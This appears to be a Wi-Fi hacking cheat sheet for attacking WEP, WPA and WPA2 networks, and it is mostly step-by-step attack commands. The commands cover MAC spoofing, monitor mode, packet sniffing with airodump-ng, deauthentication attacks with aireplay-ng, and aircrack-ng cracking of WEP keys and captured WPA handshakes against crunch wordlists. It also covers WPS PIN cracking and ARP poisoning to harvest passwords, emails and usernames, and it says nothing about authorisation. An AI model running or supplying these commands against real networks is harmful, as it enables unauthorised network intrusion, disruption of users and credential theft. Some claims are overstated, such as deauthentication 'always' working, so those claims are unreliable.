Pre-connection attacks, gaining access & post-connection attacks on WEP, WPA & WPA2. 🛰✔️
-
Linux + wireless adapter.
-
Change the MAC address of your wireless adapter, either for hiding a computer on a network or for allowing it to impersonate another network device.
ifconfig wireless_adapter_name down
ifconfig wireless_adapter_name hw ether 00:19:35:89:88:14
ifconfig wireless_adapter_name up
- Change your wireless interface to "Monitor" mode. By default, the mode of wireless devices is set to "Managed", that means our wireless device will only capture packets that have our device's MAC address as the destination MAC.
ifconfig wireless_adapter_name down
airmon-ng check kill (kill all interference processes)
iwconfig wireless_adapter_name mode monitor
ifconfig wireless_adapter_name up
iwconfig
- Discover the networks around you:
airodump-ng wireless_adapter_name
- Sniff the packets from a specified network:
airodump-ng --bssid target_MAC --channel N (--write file_name) wireless_adapter_name
- Deauthentication attack (disconnect any device from the network):
aireplay-ng --deauth time_out -a router_addr -c target_mac_addr wireless_adapter_name
This attack will always work ! The only way around it is to change the MAC address of the target machine.
-
WEP cracking : (~100% success)
Each packet is encrypted using a unique key stream.
A random initialization vector (IV) is used to generate the keys stream. This initialization vector is only 24 bits long.
The IV is too small and sent in plain text, so in busy networks, IV's will repeat, making it vulnerable to statistical attacks. Therefore, the key stream can be determined and the encryption broken.To crack WEP, we need a large number of packets/IVs to analyse the IVs and crack the router's key.
Step 1:
Capture a large number of packetsairodump-ng --bssid MAC --channel N --write file_name wireless_adapter_nameStep 2:
Run aircrack-ng to crack the passwordaircrack-ng .cap_file_captured_previouslyGets cracked instantly !
-
WPA/WPA2 cracking : (~40% success)
The goal is to capture the handshake (4 packets) between the router and a device.
Step 1:
Run a deauthentication attack against a device connected to the router and wait for him to connect back to it OR wait for a new client to connect.Step 2:
Catch the 4-way handshake (EAPOL) using "airodump-ng" of a client (re)connecting.
In a straight forward way, the handshake doesn't contain data that helps recover the key.
However, it contains data that can be used to compute if a key is valid or not !
Useful information in the handshake - Message Integrity Code (MIC): SP address, STA address, AP nonce, STA nonce, EAPOL, PayloadStep 3:
Start guessing the router's passphrase by computing the PTK and the resulting MIC (from KCK key).
The passphrase generates the PSK --> the PSK generates the PMK --> the PMK generates the PTK --> the PTK generates the MIC with the KCK key.
Create a wordlist/dictionnary:
Example: "crunch 6 8 abc123 -o wordlist.txt" --> creates a wordlist of length 6 to 8 with characters abc123 in a file called wordlist.txt
Argument "-d 1@" is specified for non-repeating letters.aircrack-ng file_containing_handshake.cap -w word_listStep 4 :
The aircrack-ng command will generate new MICs from the wordlist and compare each of them to the (2nd message) MIC of the 4-way handshake.
if(new_MIC == MIC_handshake), then the passphrase generating this MIC is the router's password !
aircrack-ng.PYUR.wordlist.mp4
Another method:
Exploit the WPS feature (except if PBC is enabled: Push Button Authentication)
The WPS feature allows clients to connect without a password.
Authentication is done using a 8 digit pin, which can be cracked under a minute.
- ARP poisoning using bettercap, arpspoof, etc.:
The captured packets are then easily analysed (using Wireshark) to gather passwords, emails, usernames, etc.